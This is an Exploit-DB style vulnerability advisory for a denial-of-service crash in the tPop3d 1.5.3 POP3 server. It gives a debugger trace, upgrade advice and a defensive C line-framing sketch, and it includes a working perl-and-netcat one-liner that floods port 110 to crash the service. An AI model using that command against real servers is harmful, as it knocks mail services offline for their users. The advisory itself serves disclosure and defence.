Vendor: tPop3d
By: OrderZero
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 400
Product Name: tPop3d
Affected Version From: 1.5.3
Affected Version To: 1.5.3
Patch Exists: Yes
Related CWE: N/A
CPE: tpop3d
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

tPop3d 1.5.3 DoS

tPop3d 1.5.3 is vulnerable to a Denial of Service attack. An attacker who sends a large number of 'a' characters to the target's port 110 causes a segmentation fault that crashes the service.

Mitigation:

Upgrade to the latest version of tPop3d.

Exploit-DB raw data:

# Exploit Title: tPop3d 1.5.3 DoS
# Date: 3/26/10
# Author: OrderZero
# Software Link: http://www.ex-parrot.com/~chris/tpop3d/
# Download: http://www.ex-parrot.com/~chris/tpop3d/tpop3d-1.5.3.tar.gz
# Version: 1.5.3
# Debug:
Starting program: /usr/local/sbin/tpop3d -d
listener_new: gethostbyaddr(0.0.0.0): cannot resolve name
listener_new: 0.0.0.0:110: cannot obtain domain suffix for this address
listener_new: 0.0.0.0:110: using fallback domain suffix `bt'
parse_listeners: listening on address 0.0.0.0:110
1 authentication drivers successfully loaded
net_loop: tpop3d version 1.5.3 successfully started
listeners_post_select: client [7]192.168.1.146/bt: connected to local address 192.168.1.139:110
Program received signal SIGSEGV, Segmentation fault.
0x0804b969 in buffer_consume_to_mark (B=0x8ef4ef0, mark=0x80572af "\n",
mlen=1, str=0x0, slen=0x805a440) at buffer.c:153
153 for (k = (int)mlen - 1; k < (int)a; k += skip[(unsigned char)mark[k]]) {


#exploit:
perl -e 'printf "a"x999999' | nc target 110
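
A defensive sketch in C, added here and not taken from tpop3d or from the original advisory: the backtrace above shows the crash inside the search for the "\n" mark over input that never contains one, so this example frames lines with unsigned, bounds-checked indices and caps how much unterminated input is accepted. The page does not state the root cause or the upstream fix; `find_mark`, `next_line` and the `MAX_LINE` value are hypothetical names chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical policy cap on one command line; not a tpop3d setting. */
#define MAX_LINE 512

enum line_status { LINE_READY, LINE_NEED_MORE, LINE_TOO_LONG };

/* Horspool search for mark[0..mlen) in buf[0..len). Indices are size_t and
 * every read is below len. Returns the match offset, or len if none. */
static size_t find_mark(const unsigned char *buf, size_t len,
                        const unsigned char *mark, size_t mlen)
{
    size_t skip[256], i, k;
    if (mlen == 0 || mlen > len)
        return len;
    for (i = 0; i < 256; i++)
        skip[i] = mlen;
    for (i = 0; i + 1 < mlen; i++)
        skip[mark[i]] = mlen - 1 - i;
    /* k indexes the byte of buf aligned with the last byte of mark. */
    for (k = mlen - 1; k < len; k += skip[buf[k]])
        if (memcmp(buf + k - (mlen - 1), mark, mlen) == 0)
            return k - (mlen - 1);
    return len;
}

/* Classify the bytes buffered for one client. On LINE_READY, *consumed is
 * the line length including the terminator. */
enum line_status next_line(const unsigned char *buf, size_t len,
                           size_t *consumed)
{
    static const unsigned char mark[] = "\n";
    size_t window = len < MAX_LINE ? len : MAX_LINE;
    size_t pos = find_mark(buf, window, mark, 1);
    if (pos < window) {
        *consumed = pos + 1;
        return LINE_READY;
    }
    /* No terminator yet: wait, unless MAX_LINE bytes arrived without one,
     * in which case the caller should close the connection. */
    return len >= MAX_LINE ? LINE_TOO_LONG : LINE_NEED_MORE;
}

int main(void)
{
    size_t n;
    /* Constructed sample input: exits 0 when the line is framed. */
    return next_line((const unsigned char *)"NOOP\r\n", 6, &n) != LINE_READY;
}
```

A server loop would call `next_line` after each read and close the client on `LINE_TOO_LONG` instead of growing its buffer.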